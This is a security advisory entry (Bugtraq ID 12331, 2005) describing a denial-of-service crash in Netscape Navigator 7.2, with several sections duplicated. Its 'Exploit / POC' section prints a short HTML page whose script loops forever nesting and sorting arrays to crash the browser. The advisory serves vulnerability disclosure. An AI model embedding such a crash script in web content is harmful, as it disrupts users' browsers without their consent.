Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
BID:12331
Info
Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
| Bugtraq ID: | 12331 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 21 2005 12:00AM |
| Updated: | Jan 21 2005 12:00AM |
| Credit: | Discovery of the original issue is credited to Berend-Jan Wever. <[email protected]> is credited with the discovery of the issue in Netscape Navigator. |
| Vulnerable: |
Netscape Navigator 7.2 |
| Not Vulnerable: | |
Discussion
Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.
Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.
Exploit / POC
Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
The following example will cause the browser to crash:
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
The following example will cause the browser to crash:
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
Solution / Fix
Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Netscape Navigator Infinite Array Sort Denial of Service Vulnerability
References:
References:
- Netscape Browser Central (Netscape)